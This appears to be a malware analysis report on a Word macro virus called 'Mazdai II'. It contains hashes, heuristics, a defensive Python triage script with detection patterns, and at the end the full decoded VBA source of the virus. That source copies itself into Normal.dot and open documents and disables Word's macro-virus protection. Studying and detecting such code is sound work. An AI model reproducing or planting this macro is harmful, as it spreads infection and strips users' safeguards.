Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 284cadf5debb28b1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 47.5 KB
Created: 2003-07-08 11:03:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 70b1cbc8cae4e9e8e9b8aebfcc4f7a0f
SHA-1: 92a2b47337eb3028684f4834a48126e1145328e8
SHA-256: 284cadf5debb28b1f33497c9a5826763027ac31e6b19be97ff03b2bdde7ac24a
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word document whose VBA project carries a self-replicating macro virus of the W97M class; the report's string heuristics also flagged legacy WordBasic markers. ClamAV matches the carved macro module with the signature Doc.Trojan.Skaarj-1. The extracted Document_Close procedure identifies itself with the constant 'Mazdai II (Free-Harm Built) Version 2.2 © SKAARJ Y2K', then uses the VBE object model (CodeModule.Find, DeleteLines, InsertLines) to copy its own Document_Close body into Normal.dot and into every open .doc/.dot whose project lacks that marker, rewrites the summary properties (Title, Author, Comments, Keywords) of each newly infected document, and finally sets Options.VirusProtection, SaveNormalPrompt and ConfirmConversions to 0 so Word neither warns about macros nor prompts to save the modified global template. The only visible payload is a message box drawn at random from a list of slogans, shown with about a 1-in-20 chance once the month value stored via SaveSetting under Visdata\Engines\sizeX differs from the current month. The self-replication and the tampering with VirusProtection alone justify the malicious verdict; the message boxes are incidental. Note that the decoded VBA module uses Document_Close rather than AutoOpen as its entry point, so the WordBasic-marker hit comes from strings in the document's streams, not from this module; confirm it with a raw string scan before reporting a second, WordBasic-era macro.

Heuristics (3)

  • VBA macros detected (severity: medium; 1 related finding; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical; ID: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
  • Legacy WordBasic macro-virus markers (severity: high; ID: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
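As an added example (not the analysis platform's code and not part of the original report), the following Python re-implements the three heuristics above as a stand-alone triage script that runs offline over olevba-style decoded VBA source and over raw OLE bytes, and additionally uses the sample's own infection marker as a signature. The OLE_* rule IDs follow the report; SIG_MAZDAI_II_MARKER, OLE_VBA_AUTOEXEC and OLE_VBA_GLOBAL_TEMPLATE_ACCESS are hypothetical names, the sample inputs are constructed, and trying both 8-bit and UTF-16LE spellings of the WordBasic names is an assumption about how such strings may be stored.

```python
"""Offline triage of an olevba-extracted VBA module and of raw OLE bytes.

Added example, not the report platform's own engine: it re-implements the
heuristics above as plain regex and byte rules so the hit on the
'C.CodeModule.DeleteLines ...' line can be reproduced without Office.
Rule IDs prefixed OLE_ follow the report; the others are hypothetical.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# VBE object-model calls that WRITE code into a project. Reads such as
# CodeModule.Find or CodeModule.Lines are not flagged on their own.
VBE_WRITE = re.compile(r"\b(?:InsertLines|DeleteLines|AddFromString|ReplaceLine|OrganizerCopy)\b", re.I)
# Touching the global template is what lets the code outlive its carrier document.
GLOBAL_TEMPLATE = re.compile(r"\bNormalTemplate\b|\bNormal\.dot\b", re.I)
# Word options that silence the macro warning and the Normal.dot save prompt.
AV_TAMPER = re.compile(r"\.(?:VirusProtection|SaveNormalPrompt|ConfirmConversions)\s*=\s*(?:0|False)\b", re.I)
# Auto-execution entry points of a modern VBA project.
AUTO_EXEC = re.compile(r"\bSub\s+(?:Document_(?:Open|Close|New)|Auto(?:Open|Close|Exec|New|Exit))\b", re.I)
# The virus's own infection marker: it checks for this string before infecting,
# so it doubles as a reliable signature for the decoded source.
MAZDAI_MARKER = "Mazdai II (Free-Harm Built)"
# WordBasic names from the heuristic above, searched as raw bytes because
# Word 6/95 macros are not exposed as a VBA project. Both 8-bit and UTF-16LE
# spellings are tried (assumption: either encoding may occur in the streams).
WORDBASIC_MARKERS = (b"AutoOpen", b"AutoClose", b"ToolsMacro", b"MacroFile", b"FileMacro", b"GlobMacro")


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str  # medium / high / critical
    line: int      # 1-based line in the VBA source; 0 for raw-stream hits
    evidence: str


def scan_vba_source(src: str) -> list[Finding]:
    """Line-oriented scan of decoded VBA source such as olevba output."""
    out: list[Finding] = []
    for no, raw in enumerate(src.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("'"):
            continue  # blank or comment line
        if AUTO_EXEC.search(line):
            out.append(Finding("OLE_VBA_AUTOEXEC", "medium", no, line))
        if MAZDAI_MARKER in line:
            out.append(Finding("SIG_MAZDAI_II_MARKER", "high", no, line))
        if GLOBAL_TEMPLATE.search(line):
            out.append(Finding("OLE_VBA_GLOBAL_TEMPLATE_ACCESS", "high", no, line))
        if VBE_WRITE.search(line) or AV_TAMPER.search(line):
            out.append(Finding("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", no, line))
    return out


def scan_raw_streams(data: bytes) -> list[Finding]:
    """Byte search for legacy WordBasic markers in the raw OLE container."""
    out: list[Finding] = []
    for marker in WORDBASIC_MARKERS:
        for enc, needle in (("ansi", marker), ("utf-16le", marker.decode().encode("utf-16-le"))):
            off = data.find(needle)
            if off != -1:
                out.append(Finding("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high", 0,
                                   f"{marker.decode()} ({enc}) at offset {off}"))
    return out


def verdict(findings: list[Finding]) -> str:
    """Replication plus global-template access is a macro virus regardless of AV signatures."""
    rules = {f.rule for f in findings}
    if "OLE_VBA_MACRO_VIRUS_REPLICATION" in rules and "OLE_VBA_GLOBAL_TEMPLATE_ACCESS" in rules:
        return "malicious: self-replicating Word macro virus"
    if any(f.severity in ("high", "critical") for f in findings):
        return "suspicious: manual review required"
    return "macros present" if findings else "no macro indicators"


# Constructed inputs: a condensed excerpt mirroring the extracted module, and
# a fake stream holding one 8-bit and one UTF-16LE WordBasic marker.
SAMPLE_VBA = """\
Private Sub Document_Close()
    Const MarkSign = "Mazdai II (Free-Harm Built) Version 2.2"
    For Each C In NormalTemplate.VBProject.VBComponents
        If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then Found = True
    Next
    t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
    C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
    C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), 10)
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
End Sub
"""
SAMPLE_RAW = b"\x00" * 16 + b"AutoOpen\x00junk" + "ToolsMacro".encode("utf-16-le") + b"\x00" * 8

if __name__ == "__main__":
    hits = scan_vba_source(SAMPLE_VBA) + scan_raw_streams(SAMPLE_RAW)
    for h in hits:
        print(f"{h.severity:8} {h.rule:36} L{h.line}: {h.evidence}")
    print(verdict(hits))
```

To run it against the carved artifact, pass the contents of macros.bas to scan_vba_source and the original .doc bytes to scan_raw_streams; the separation matters because the WordBasic rule deliberately ignores the decoded VBA, which in this sample contains no AutoOpen at all.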

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5023 bytes
SHA-256: fac990f5b54c2fb06f1512c1a9ef7c71b86b8e5089a9ecba1313ef99c4b9fb80
Detection
ClamAV: Doc.Trojan.Skaarj-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script (this module is 103 lines, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    Const MarkSign = "Mazdai II (Free-Harm Built) Version 2.2 © SKAARJ Y2K"
    On Error GoTo handler
    Dim WDoc As Word.Document, M As Object, C As Object, Infected As Boolean, Found As Boolean
    Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, N As Boolean, Process As Byte
    Set M = Nothing
    N = False
    Process = 0
    Mon = GetSetting("Visdata", "Engines", "sizeX")
    If Mon = "" Then
        SaveSetting "Visdata", "Engines", "sizeX", Month(Now)
    ElseIf Mon - Month(Now) <> 0 Then
        If Rnd * 20 < 1 Then
            Do
                Phrase = Int(12 * Rnd)
            Loop While Phrase > 11
            Select Case Phrase
                Case 0: MsgBox "Nowhere to run, nowhere to hide ", vbExclamation, "Mazdai II"
                Case 1: MsgBox "Life is short - boost yourself", vbExclamation, "Mazdai II"
                Case 3: MsgBox "It's nice to be important, but it's more important to be nice ;-)" & vbCrLf & "Scooter", vbExclamation, "Mazdai II"
                Case 4: MsgBox "I have no mouth and I must scream", vbExclamation, "Mazdai II"
                Case 5: MsgBox "Death is not punishment - it is disposal", vbExclamation, "Mazdai II"
                Case 6: MsgBox "Trust no one", vbExclamation, "Mazdai II"
                Case 7: MsgBox "Forget the past - work for the future", vbExclamation, "Mazdai II"
                Case 8: MsgBox "Time is NOW!", vbExclamation, "Mazdai II"
                Case 9: MsgBox "SMILE! :~)", vbExclamation, "Mazdai II"
                Case 10: MsgBox "Touch the SKY!", vbExclamation, "Mazdai II"
                Case 11: MsgBox "The truth is out there", vbExclamation, "Mazdai II"
            End Select
        End If
    End If
    Found = False
    For Each C In NormalTemplate.VBProject.VBComponents
        If C.Type = 100 Then
            If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
                Found = True
                Set M = C.CodeModule
            End If
        End If
    Next
    Do
        For Each WDoc In Word.Documents
            If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then
                For Each C In WDoc.VBProject.VBComponents
                    If C.Type = 100 Then
                        If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
                            Set M = C.CodeModule
                            Found = True
                        ElseIf Found Then
                            Saved = WDoc.Saved
                            On Error GoTo handler
                            t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
                            C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out:
                            C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
                            With Dialogs(wdDialogFileSummaryInfo)
                                .Title = "Surprise!!!"
                                .Author = "SKAARJ"
                                .Comments = "This is a second virus of SKAARJ from RUSSIA. This virus will not harm your system - it's only a test"
                                .Keywords = "SKAARJ, Virii, HTP, Experiment, Mazdai II"
                            End With
                            If Saved Then WDoc.Save
                            Infected = True
                        End If
                    End If
                Next
            End If
        Next
        Process = Process + 1
        If Process = 3 Then Exit Do
    Loop Until Infected
    If Found Then
        For Each C In NormalTemplate.VBProject.VBComponents
            If C.Type = 100 Then
                If Not C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
                    Saved = NormalTemplate.Saved
                    N = True
                    t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
                    C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out1:
                    C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
                    If Saved Then NormalTemplate.Save
                End If
            End If
        Next
    End If
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    Exit Sub
handler:
    t = 1
    If N = False Then
        Resume out
    Else
        Resume out1
    End If
End Sub